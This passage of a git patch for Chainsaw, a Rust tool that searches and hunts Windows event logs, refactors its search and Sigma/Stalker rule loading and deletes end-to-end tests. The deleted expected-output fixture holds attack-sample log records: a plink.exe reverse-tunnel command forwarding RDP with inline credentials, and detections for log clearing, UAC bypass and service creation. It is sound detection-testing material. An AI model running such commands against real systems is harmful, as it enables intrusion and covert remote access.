+use std::path::PathBuf; +use std::str::FromStr; + +use serde::Deserialize; + +pub use chainsaw::Rule; + +pub mod chainsaw; +pub mod sigma; +pub mod stalker; + +#[derive(Debug, Deserialize)] +#[serde(rename_all = "snake_case")] +pub enum Kind { + Chainsaw, + Sigma, + Stalker, +} + +impl Default for Kind { + fn default() -> Self { + Self::Chainsaw + } +} + +impl FromStr for Kind { + type Err = anyhow::Error; + + fn from_str(s: &str) -> Result { + let v = match s { + "chainsaw" => Self::Chainsaw, + "sigma" => Self::Sigma, + "stalker" => Self::Stalker, + _ => anyhow::bail!("unknown kind, must be: chainsaw, sigma or stalker"), + }; + Ok(v) + } +} + +pub fn load_rule(kind: &Kind, path: &PathBuf) -> crate::Result> { + if let Some(x) = path.extension() { + if x != "yml" && x != "yaml" { + anyhow::bail!("rule must have a yaml file extension"); + } + } + let rules = match kind { + Kind::Chainsaw => { + unimplemented!() + } + Kind::Sigma => match sigma::load(&path) { + Ok(rules) => rules + .into_iter() + .filter_map(|r| serde_yaml::from_value(r).ok()) + .collect(), + Err(e) => anyhow::bail!(e), + }, + Kind::Stalker => match stalker::load(&path) { + Ok(rule) => vec![rule], + Err(e) => anyhow::bail!(e), + }, + }; + Ok(rules) +} + +pub fn lint_rule(kind: &Kind, path: &PathBuf) -> crate::Result<()> { + if let Some(x) = path.extension() { + if x != "yml" && x != "yaml" { + anyhow::bail!("rule must have a yaml file extension"); + } + } + match kind { + Kind::Chainsaw => { + unimplemented!() + } + Kind::Sigma => { + if let Err(e) = sigma::load(&path) { + let file_name = match path.to_string_lossy().split('/').last() { + Some(e) => e.to_string(), + None => path.display().to_string(), + }; + if let Some(source) = e.source() { + anyhow::bail!("{:?}: {} - {}", file_name, e, source); + } else { + anyhow::bail!("{:?}: {}", file_name, e); + } + } + } + Kind::Stalker => { + if let Err(e) = stalker::load(&path) { + let file_name = match path.to_string_lossy().split('/').last() { + Some(e) => e.to_string(), + None => path.display().to_string(), + }; + anyhow::bail!("{:?}: {}", file_name, e); + } + } + } + Ok(()) +} diff --git a/src/convert/sigma.rs b/src/rule/sigma.rs similarity index 98% rename from src/convert/sigma.rs rename to src/rule/sigma.rs index fc0ab57d..eec09e7c 100644 --- a/src/convert/sigma.rs +++ b/src/rule/sigma.rs @@ -16,16 +16,6 @@ struct Detection { pub identifiers: Mapping, } -//#[derive(Clone, Deserialize)] -//struct LogSource { -// #[serde(default)] -// pub category: Option, -// #[serde(default)] -// pub product: Option, -// #[serde(default)] -// pub service: Option, -//} - #[derive(Clone, Deserialize)] struct Header { pub title: String, @@ -46,8 +36,6 @@ struct Sigma { pub header: Option
, #[serde(default)] pub level: Option, - //#[serde(default)] - //pub logsource: Option, #[serde(default)] pub detection: Option, } diff --git a/src/rule/stalker.rs b/src/rule/stalker.rs new file mode 100644 index 00000000..7754aa00 --- /dev/null +++ b/src/rule/stalker.rs @@ -0,0 +1,38 @@ +use std::fs::File; +use std::io::Read; +use std::path::Path; + +use serde::Deserialize; +use tau_engine::Rule as Tau; + +use crate::rule::Rule; + +#[derive(Clone, Deserialize)] +pub struct Stalker { + tag: String, + tau: Tau, + level: String, + status: String, + authors: Vec, +} + +impl From for Rule { + fn from(stalker: Stalker) -> Self { + Self { + tag: stalker.tag, + level: stalker.level, + status: stalker.status, + tau: stalker.tau, + authors: stalker.authors, + } + } +} + +pub fn load(rule: &Path) -> crate::Result { + let mut file = File::open(rule)?; + let mut contents = String::new(); + file.read_to_string(&mut contents)?; + + let stalker: Stalker = serde_yaml::from_str(&contents)?; + Ok(Rule::from(stalker)) +} diff --git a/src/search.rs b/src/search.rs index 2bdb4402..1a887f79 100644 --- a/src/search.rs +++ b/src/search.rs @@ -1,233 +1,292 @@ -use std::fs::File; -use std::path::PathBuf; - -use anyhow::Result; -use chrono::NaiveDateTime; -use evtx::{EvtxParser, ParserSettings}; -use regex::Regex; -use structopt::StructOpt; - -use crate::util::get_evtx_files; - -#[derive(StructOpt)] -pub struct SearchOpts { - /// Specify an EVTX file, or a directory containing the EVTX files to search. - /// If you specify a directory, all files matching *.evtx will be used. - pub evtx_path: PathBuf, - - /// Suppress all unnecessary output - #[structopt(short = "q", long = "quiet")] - pub quiet: bool, - - /// This option can be used in conjunction with any other search methods. It will only return - /// results of the event ID supplied. - #[structopt(short = "e", long = "event")] - pub event_id: Option, - - /// Use this option to search EVTx files for the string supplied. If the string is found, the - /// whole matching event will be returned. - /// Use the -i flag for case insensitive searches. - #[structopt(short = "s", long = "string")] - pub search_string: Option, - - /// Skip EVTX file if chainsaw is unable to parse the records - #[structopt(long = "ignore-errors")] - pub ignore: bool, - - /// Set search to case insensitive. Usable only with string searching. - #[structopt(short = "i", long = "case-insensitive")] - pub case_insensitive: bool, - - /// Output matching event log entries in a JSON format - #[structopt(short, long = "json")] - pub json: bool, - - /// Use this option to search EVTx files for the regex pattern supplied. If a pattern match is found, the - /// whole matching event will be returned. - #[structopt(short = "r", long = "regex-search")] - pub search_regex: Option, - - /// Start date for including events (UTC). Anything older than this is dropped. Format: YYYY-MM-DDTHH:MM:SS. Example: 2019-11-17T17:55:11 - #[structopt(long = "start-date")] - pub start_date: Option, - - /// End date for including events (UTC). Anything newer than this is dropped. Format: YYYY-MM-DDTHH:MM:SS. Example: 2019-11-17T17:55:11 - #[structopt(long = "end-date")] - pub end_date: Option, - - /// Output with be saved to the specified file path, this is ignored by --csv - #[structopt(long = "output")] - pub output: Option, -} - -pub fn run_search(opt: SearchOpts) -> Result { - // Load EVTX Files - let evtx_files = get_evtx_files(&opt.evtx_path)?; - if opt.json { - cs_print!("["); - } +use std::path::Path; - let mut sd_marker = None; - let mut ed_marker = None; +use chrono::{DateTime, NaiveDateTime, TimeZone, Utc}; +use chrono_tz::Tz; +use regex::{RegexSet, RegexSetBuilder}; +use serde_json::Value as Json; +use tau_engine::{ + core::parser::{BoolSym, Expression}, + Document as Doc, +}; - let time_format = "%Y-%m-%dT%H:%M:%S"; +use crate::ext; +use crate::file::{Document, Documents, Reader}; - // if start date filter is provided, validate that the provided string is a valid timestamp - if let Some(x) = &opt.start_date { - sd_marker = match NaiveDateTime::parse_from_str(x.as_str(), time_format) { - Ok(a) => { - cs_eprintln!("[+] Filtering out events before: {}", a); - Some(a) - } - Err(e) => return Err(anyhow!("Error parsing provided start-date filter: {}", e)), - } - } +pub struct Hits<'a> { + reader: Reader, + searcher: &'a SearcherInner, +} - // if end date filter is provided, validate that the provided string is a valid timestamp - if let Some(x) = &opt.end_date { - ed_marker = match NaiveDateTime::parse_from_str(x.as_str(), time_format) { - Ok(a) => { - cs_eprintln!("[+] Filtering out events after: {}", a); - Some(a) - } - Err(e) => return Err(anyhow!("Error parsing provided end-date filter: {}", e)), +impl<'a> Hits<'a> { + pub fn iter(&mut self) -> Iter<'_> { + Iter { + documents: self.reader.documents(), + searcher: self.searcher, } } +} - // Loop through EVTX files and perform actions - let mut hits = 0; - cs_eprintln!("[+] Searching event logs..."); - for evtx in &evtx_files { - // Parse EVTx files - let settings = ParserSettings::default() - .separate_json_attributes(true) - .num_threads(0); - let parser = match EvtxParser::from_path(evtx) { - Ok(a) => a.with_configuration(settings), - Err(e) => { - if opt.ignore { - continue; - } - return Err(anyhow!("{:?} - {}", evtx, e)); - } - }; - - // Search EVTX files for user supplied arguments - hits += search_evtx_file(parser, &opt, hits == 0, sd_marker, ed_marker)?; - } - if opt.json { - cs_println!("]"); - } - Ok(format!("\n[+] Found {} matching log entries", hits)) +pub struct Iter<'a> { + documents: Documents<'a>, + searcher: &'a SearcherInner, } -pub fn search_evtx_file( - mut parser: EvtxParser, - opt: &SearchOpts, - first: bool, - sd_marker: Option, - ed_marker: Option, -) -> Result { - let mut hits = 0; - - for record in parser.records_json_value() { - // TODO - work out why chunks of a record can fail here, but the overall event logs count - // isn't affected. If this parser isn't seeing an event that you know exists, it's mostly - // likely due to this match block - let r = match record { - Ok(record) => record, - Err(_) => { - continue; - } - }; +impl<'a> Iterator for Iter<'a> { + type Item = crate::Result; - // Perform start/end datetime filtering - if sd_marker.is_some() || ed_marker.is_some() { - let event_time = match NaiveDateTime::parse_from_str( - r.data["Event"]["System"]["TimeCreated_attributes"]["SystemTime"] - .as_str() - .unwrap(), - "%Y-%m-%dT%H:%M:%S%.6fZ", - ) { - Ok(t) => t, - Err(_) => { - return Err(anyhow!( - "Failed to parse datetime from supplied events. This shouldn't happen..." - )); + fn next(&mut self) -> Option { + while let Some(document) = self.documents.next() { + let document = match document { + Ok(document) => document, + Err(e) => { + if self.searcher.skip_errors { + continue; + } + return Some(Err(e)); } }; - - // Check if event is older than start date marker - if let Some(sd) = sd_marker { - if event_time <= sd { - continue; + if self.searcher.timestamp.is_some() + && (self.searcher.from.is_some() || self.searcher.to.is_some()) + { + let field = self + .searcher + .timestamp + .as_ref() + .expect("could not get timestamp"); + // TODO: Default to RFC 3339 + let timestamp = match &document { + Document::Evtx(evtx) => match crate::evtx::Wrapper(&evtx.data).find(&field) { + Some(value) => match value.as_str() { + Some(timestamp) => { + match NaiveDateTime::parse_from_str( + timestamp, + "%Y-%m-%dT%H:%M:%S%.6fZ", + ) { + Ok(t) => t, + Err(e) => { + if self.searcher.skip_errors { + cs_eyellowln!( + "failed to parse timestamp '{}' - {}", + timestamp, + e, + ); + continue; + } else { + return Some(Err(anyhow::anyhow!( + "failed to parse timestamp '{}' - {}", + timestamp, + e + ))); + } + } + } + } + None => continue, + }, + None => continue, + }, + }; + // TODO: Not sure if this is correct... + let localised = if let Some(timezone) = self.searcher.timezone { + let local = match timezone.from_local_datetime(×tamp).single() { + Some(l) => l, + None => { + if self.searcher.skip_errors { + cs_eyellowln!("failed to localise timestamp"); + continue; + } else { + return Some(Err(anyhow::anyhow!("failed to localise timestamp"))); + } + } + }; + local.with_timezone(&Utc) + } else if self.searcher.local { + match Utc.from_local_datetime(×tamp).single() { + Some(l) => l, + None => { + if self.searcher.skip_errors { + cs_eyellowln!("failed to localise timestamp"); + continue; + } else { + return Some(Err(anyhow::anyhow!("failed to localise timestamp"))); + } + } + } + } else { + DateTime::::from_utc(timestamp, Utc) + }; + // Check if event is older than start date marker + if let Some(sd) = self.searcher.from { + if localised <= sd { + continue; + } + } + // Check if event is newer than end date marker + if let Some(ed) = self.searcher.to { + if localised >= ed { + continue; + } } } - // Check if event is newer than end date marker - if let Some(ed) = ed_marker { - if event_time >= ed { + let r = match document { + Document::Evtx(evtx) => evtx, + }; + if let Some(expression) = &self.searcher.tau { + if !tau_engine::core::solve(&expression, &crate::evtx::Wrapper(&r.data)) { continue; } } + if r.matches(&self.searcher.regex) { + return Some(Ok(r.data)); + } } - // Do processing of EVTX record now it's in a JSON format - // - // The default action of the whole OK logic block it mark a record as matched - // If a filter criteria is NOT matched, then we contiue the loop and don't push the - // Record onto the matched records array - - // EventIDs can be stored in two different locations - let event_id; - if r.data["Event"]["System"]["EventID"]["#text"].is_null() { - event_id = &r.data["Event"]["System"]["EventID"]; - } else { - event_id = &r.data["Event"]["System"]["EventID"]["#text"]; - } + None + } +} - // Handle event_id search option - if let Some(e_id) = opt.event_id { - if event_id != e_id { - continue; - } - }; - // Handle string search option - if let Some(string) = &opt.search_string { - if opt.case_insensitive { - // Case insensitive string search - if !r - .data - .to_string() - .to_lowercase() - .contains(&string.to_lowercase()) - { - continue; +pub trait Searchable { + fn matches(&self, regex: &RegexSet) -> bool; +} + +#[derive(Default)] +pub struct SearcherBuilder { + patterns: Option>, + + from: Option, + ignore_case: Option, + load_unknown: Option, + local: Option, + skip_errors: Option, + tau: Option>, + timestamp: Option, + timezone: Option, + to: Option, +} + +impl SearcherBuilder { + pub fn new() -> Self { + Self::default() + } + + pub fn build(self) -> crate::Result { + let ignore_case = self.ignore_case.unwrap_or_default(); + let load_unknown = self.load_unknown.unwrap_or_default(); + let local = self.local.unwrap_or_default(); + let patterns = self.patterns.unwrap_or_default(); + let skip_errors = self.skip_errors.unwrap_or_default(); + let tau = match self.tau { + Some(kvs) => { + let mut expressions = Vec::with_capacity(kvs.len()); + for kv in &kvs { + expressions.push(ext::tau::parse_kv(kv)?); } - } else { - // Case sensitive search - if !r.data.to_string().contains(string) { - continue; + if expressions.is_empty() { + None + } else { + Some(Expression::BooleanGroup(BoolSym::And, expressions)) } } + None => None, }; - // Handle regex search option - if let Some(reg) = &opt.search_regex { - let re = Regex::new(reg)?; - if !re.is_match(&r.data.to_string()) { - continue; - } - } + let regex = RegexSetBuilder::new(patterns) + .case_insensitive(ignore_case) + .build()?; - if opt.json { - if !(first && hits == 0) { - cs_print!(","); - } - cs_print_json!(&r.data)?; - } else { - cs_print_yaml!(&r.data)?; - } + Ok(Searcher { + inner: SearcherInner { + regex: regex, + + from: self.from.map(|d| DateTime::from_utc(d, Utc)), + load_unknown, + local, + skip_errors, + tau, + timestamp: self.timestamp, + timezone: self.timezone, + to: self.to.map(|d| DateTime::from_utc(d, Utc)), + }, + }) + } + + pub fn from(mut self, datetime: NaiveDateTime) -> Self { + self.from = Some(datetime); + self + } + + pub fn ignore_case(mut self, ignore: bool) -> Self { + self.ignore_case = Some(ignore); + self + } + + pub fn load_unknown(mut self, allow: bool) -> Self { + self.load_unknown = Some(allow); + self + } + + pub fn local(mut self, local: bool) -> Self { + self.local = Some(local); + self + } + + pub fn patterns(mut self, patterns: Vec) -> Self { + self.patterns = Some(patterns); + self + } + + pub fn skip_errors(mut self, skip: bool) -> Self { + self.skip_errors = Some(skip); + self + } + + pub fn tau(mut self, kvs: Vec) -> Self { + self.tau = Some(kvs); + self + } + + pub fn timestamp(mut self, field: String) -> Self { + self.timestamp = Some(field); + self + } + + pub fn timezone(mut self, tz: Tz) -> Self { + self.timezone = Some(tz); + self + } + + pub fn to(mut self, datetime: NaiveDateTime) -> Self { + self.to = Some(datetime); + self + } +} + +pub struct SearcherInner { + regex: RegexSet, + + load_unknown: bool, + local: bool, + from: Option>, + skip_errors: bool, + tau: Option, + timestamp: Option, + timezone: Option, + to: Option>, +} + +pub struct Searcher { + inner: SearcherInner, +} + +impl Searcher { + pub fn builder() -> SearcherBuilder { + SearcherBuilder::new() + } - hits += 1; + pub fn search(&self, file: &Path) -> crate::Result> { + let reader = Reader::load(file, self.inner.load_unknown, self.inner.skip_errors)?; + Ok(Hits { + reader, + searcher: &self.inner, + }) } - Ok(hits) } diff --git a/src/util.rs b/src/util.rs deleted file mode 100644 index 01501269..00000000 --- a/src/util.rs +++ /dev/null @@ -1,102 +0,0 @@ -use std::fs; -use std::fs::{metadata, File}; -use std::path::{Path, PathBuf}; - -use anyhow::Result; -use evtx::{EvtxParser, ParserSettings}; -use indicatif::{ProgressBar, ProgressDrawTarget, ProgressStyle}; -#[cfg(windows)] -use is_elevated::is_elevated as user_is_elevated; -use walkdir::WalkDir; - -#[cfg(not(windows))] -pub const RULE_PREFIX: &str = "‣ "; - -#[cfg(windows)] -pub const RULE_PREFIX: &str = "+ "; - -#[cfg(not(windows))] -const TICK_SETTINGS: (&str, u64) = ("⠋⠙⠹⠸⠼⠴⠦⠧⠇⠏ ", 80); - -#[cfg(windows)] -const TICK_SETTINGS: (&str, u64) = (r"-\|/-", 200); - -pub fn large_event_logs(files: &[PathBuf]) -> bool { - for file in files { - let metadata = match fs::metadata(file) { - Ok(a) => a, - Err(_) => return false, - }; - if metadata.len() > 500000000 { - return true; - } - } - false -} - -pub fn get_evtx_files(mut path: &Path) -> Result> { - let mut evtx_files: Vec = Vec::new(); - if path.display().to_string() == *"win_default" { - #[cfg(windows)] - if !user_is_elevated() { - return Err(anyhow!( - "Cannot access local event logs - you are not running in an elevated session!" - )); - } - path = Path::new("C:\\Windows\\System32\\winevt\\Logs\\"); - }; - if path.exists() { - let md = metadata(&path)?; - if md.is_dir() { - // Grab files from within the specified directory - // Check that the file ends in evtx - for file in WalkDir::new(path) { - let file_a = file?; - if let Some(x) = file_a.path().extension() { - if x == "evtx" { - evtx_files.push(file_a.into_path()); - } - } - } - } else { - evtx_files = vec![path.to_path_buf()]; - } - } else { - return Err(anyhow!("Invalid input path: {}", path.display())); - }; - // Check if there is at least one EVTX file in the directory - if !evtx_files.is_empty() { - cs_eprintln!("[+] Found {} EVTX files", evtx_files.len()); - } else { - return Err(anyhow!("No EVTx files found. Check input path?")); - } - Ok(evtx_files) -} - -pub fn parse_evtx_file(evtx_file: &Path) -> Result> { - let settings = ParserSettings::default() - .separate_json_attributes(true) - .num_threads(0); - let parser = EvtxParser::from_path(evtx_file)?.with_configuration(settings); - Ok(parser) -} - -pub fn get_progress_bar(size: u64, msg: String) -> indicatif::ProgressBar { - let pb = ProgressBar::new(size); - unsafe { - match crate::write::WRITER.quiet { - true => pb.set_draw_target(ProgressDrawTarget::hidden()), - false => pb.set_draw_target(ProgressDrawTarget::stderr()), - } - }; - pb.set_style( - ProgressStyle::default_bar() - .template("[+] {msg}: [{bar:40}] {pos}/{len} {spinner}") - .tick_chars(TICK_SETTINGS.0) - .progress_chars("=>-"), - ); - - pb.set_message(msg); - pb.enable_steady_tick(TICK_SETTINGS.1); - pb -} diff --git a/src/write.rs b/src/write.rs index ca00f7a6..9e107b96 100644 --- a/src/write.rs +++ b/src/write.rs @@ -1,5 +1,4 @@ use std::fs::File; -use std::path::PathBuf; use anyhow::Result; @@ -12,7 +11,6 @@ pub static mut WRITER: Writer = Writer { pub enum Format { Std, Json, - Csv(PathBuf), } impl Default for Format { @@ -51,11 +49,12 @@ where Ok(()) } +#[macro_export] macro_rules! cs_print { ($($arg:tt)*) => ({ use std::io::Write; unsafe { - match $crate::write::WRITER.output.as_ref() { + match $crate::WRITER.output.as_ref() { Some(mut f) => { f.write_all(format!($($arg)*).as_bytes()).expect("could not write to file"); } @@ -67,11 +66,12 @@ macro_rules! cs_print { }) } +#[macro_export] macro_rules! cs_println { () => { use std::io::Write; unsafe { - match $crate::write::WRITER.output.as_ref() { + match $crate::WRITER.output.as_ref() { Some(mut f) => { f.write_all(b"\n").expect("could not write to file"); } @@ -84,7 +84,7 @@ macro_rules! cs_println { ($($arg:tt)*) => { use std::io::Write; unsafe { - match $crate::write::WRITER.output.as_ref() { + match $crate::WRITER.output.as_ref() { Some(mut f) => { f.write_all(format!($($arg)*).as_bytes()).expect("could not write to file"); f.write_all(b"\n").expect("could not write to file"); @@ -101,24 +101,25 @@ macro_rules! cs_println { macro_rules! cs_eprintln { ($($arg:tt)*) => ({ unsafe { - if !$crate::write::WRITER.quiet { + if !$crate::WRITER.quiet { eprintln!($($arg)*); } } }) } +#[macro_export] macro_rules! cs_print_json { ($value:expr) => {{ use std::io::Write; unsafe { - match $crate::write::WRITER.output.as_ref() { + match $crate::WRITER.output.as_ref() { Some(mut f) => { - $crate::serde_json::to_writer(f, $value)?; + ::serde_json::to_writer(f, $value)?; f.flush() } None => { - $crate::serde_json::to_writer(std::io::stdout(), $value)?; + ::serde_json::to_writer(std::io::stdout(), $value)?; std::io::stdout().flush() } } @@ -126,18 +127,19 @@ macro_rules! cs_print_json { }}; } +#[macro_export] macro_rules! cs_print_yaml { ($value:expr) => {{ use std::io::Write; unsafe { - match $crate::write::WRITER.output.as_ref() { + match $crate::WRITER.output.as_ref() { Some(mut f) => { - $crate::serde_yaml::to_writer(f, $value)?; + ::serde_yaml::to_writer(f, $value)?; f.write_all(b"\n")?; f.flush() } None => { - $crate::serde_yaml::to_writer(std::io::stdout(), $value)?; + ::serde_yaml::to_writer(std::io::stdout(), $value)?; println!(); std::io::stdout().flush() } @@ -149,7 +151,7 @@ macro_rules! cs_print_yaml { macro_rules! cs_print_table { ($table:ident) => { unsafe { - match $crate::write::WRITER.output.as_ref() { + match $crate::WRITER.output.as_ref() { Some(mut f) => $table.print(&mut f).expect("could not write table to file"), None => $table.printstd(), } @@ -161,7 +163,7 @@ macro_rules! cs_greenln { ($($arg:tt)*) => { use std::io::Write; unsafe { - match $crate::write::WRITER.output.as_ref() { + match $crate::WRITER.output.as_ref() { Some(mut f) => { f.write_all(format!($($arg)*).as_bytes()).expect("could not write to file"); f.write_all(b"\n").expect("could not write to file"); @@ -178,17 +180,18 @@ macro_rules! cs_greenln { macro_rules! cs_egreenln { ($($arg:tt)*) => { unsafe { - if !$crate::write::WRITER.quiet { + if !$crate::WRITER.quiet { colour::unnamed::ewrite(Some(colour::unnamed::Colour::Green), &format!($($arg)*), true); } } }; } +#[macro_export] macro_rules! cs_eyellowln { ($($arg:tt)*) => { unsafe { - if !$crate::write::WRITER.quiet { + if !$crate::WRITER.quiet { colour::unnamed::ewrite(Some(colour::unnamed::Colour::Yellow), &format!($($arg)*), true); } } @@ -199,7 +202,7 @@ macro_rules! cs_eyellowln { macro_rules! cs_eredln { ($($arg:tt)*) => { unsafe { - if !$crate::write::WRITER.quiet { + if !$crate::WRITER.quiet { colour::unnamed::ewrite(Some(colour::unnamed::Colour::Red), &format!($($arg)*), true); } } From b4d590ad646cbf3ee8163c0f048acf0d862308aa Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Thu, 2 Jun 2022 16:36:45 +0100 Subject: [PATCH 02/77] chore: clean up tests to work with the alpha --- e2e/README.md | 1 - e2e/e2e.sh | 20 - e2e/hunt_expected.json | 1 - e2e/search_expected.yml | 2197 --------------------------------------- src/lib.rs | 2 +- src/rule/mod.rs | 2 +- tests/convert.rs | 2 +- 7 files changed, 3 insertions(+), 2222 deletions(-) delete mode 100644 e2e/README.md delete mode 100755 e2e/e2e.sh delete mode 100644 e2e/hunt_expected.json delete mode 100644 e2e/search_expected.yml diff --git a/e2e/README.md b/e2e/README.md deleted file mode 100644 index 104c3b53..00000000 --- a/e2e/README.md +++ /dev/null @@ -1 +0,0 @@ -These are temporary tests until we can correctly test the parts of the code as desired. diff --git a/e2e/e2e.sh b/e2e/e2e.sh deleted file mode 100755 index fb1c4e28..00000000 --- a/e2e/e2e.sh +++ /dev/null @@ -1,20 +0,0 @@ -#!/bin/bash - -set -e - -SCRIPT_DIR=$( cd -- "$( dirname -- "${BASH_SOURCE[0]}" )" &> /dev/null && pwd ) - -echo "[!] Testing hunt..." - -cargo run -- hunt ${SCRIPT_DIR}/../evtx_attack_samples --mapping ${SCRIPT_DIR}/../mapping_files/sigma-mapping.yml --rules ${SCRIPT_DIR}/../sigma_rules -j > /tmp/chainsaw.json 2>/dev/null -diff /tmp/chainsaw.json ${SCRIPT_DIR}/hunt_expected.json -rm /tmp/chainsaw.json - -echo "[+] Success..." - -echo "[!] Testing search..." -cargo run -- search ${SCRIPT_DIR}/../evtx_attack_samples -i -s bypass > /tmp/chainsaw.yml 2>/dev/null -diff /tmp/chainsaw.yml ${SCRIPT_DIR}/search_expected.yml -rm /tmp/chainsaw.yml - -echo "[+] Success..." diff --git a/e2e/hunt_expected.json b/e2e/hunt_expected.json deleted file mode 100644 index bd5d4a62..00000000 --- a/e2e/hunt_expected.json +++ /dev/null @@ -1 +0,0 @@ -[{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":1102,"EventRecordID":227693,"Execution_attributes":{"ProcessID":820,"ThreadID":608},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-02-13T18:01:41.593830Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0xaf855","SubjectUserName":"admin01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1108"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Exfiltration and Tunneling Tools Execution"],"event":{"Event":{"EventData":{"CommandLine":"","NewProcessId":"0xcfc","NewProcessName":"C:\\Users\\user01\\Desktop\\plink.exe","ProcessId":"0xe60","SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x2ed80","SubjectUserName":"user01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1106","TokenElevationType":"%%1936"},"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":4688,"EventRecordID":227714,"Execution_attributes":{"ProcessID":4,"ThreadID":56},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider_attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"},"Security":null,"Task":13312,"TimeCreated_attributes":{"SystemTime":"2019-02-13T18:03:28.318440Z"},"Version":1}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Exfiltration and Tunneling Tools Execution"],"event":{"Event":{"EventData":{"CommandLine":"plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test","Company":"Simon Tatham","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Command-line SSH, Telnet, and Rlogin client","FileVersion":"Release 0.70","Hashes":"SHA1=7806AD24F669CD8BB9EBE16F87E90173047F8EE4","Image":"C:\\Users\\IEUser\\Desktop\\plink.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-D6AB-5C67-0000-002056660200","LogonId":"0x26656","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-D92A-5C67-0000-0010CB580900","ParentProcessId":3904,"ProcessGuid":"365ABB72-DFAD-5C67-0000-0010E0811500","ProcessId":2312,"Product":"PuTTY suite","RuleName":"","TerminalSessionId":1,"User":"PC01\\IEUser","UtcTime":"2019-02-16 10:02:21.934"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1940899,"Execution_attributes":{"ProcessID":1728,"ThreadID":412},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-02-16T10:02:21.934438Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-07-19 14:43:46.619","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\phvj2yfb\\phvj2yfb.dll","UtcTime":"2019-07-19 14:43:46.619"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":3575,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:43:46.623217Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["New Service Creation"],"event":{"Event":{"EventData":{"CommandLine":"sc.exe create AtomicTestService binPath= C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Service Control Manager Configuration Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF","Image":"C:\\Windows\\System32\\sc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"sc.exe create AtomicTestService binPath= C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D738-5D31-0000-001046A02600","ParentProcessId":4216,"ProcessGuid":"747F3D96-D738-5D31-0000-001098A22600","ProcessId":1700,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence or Exec - Services Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 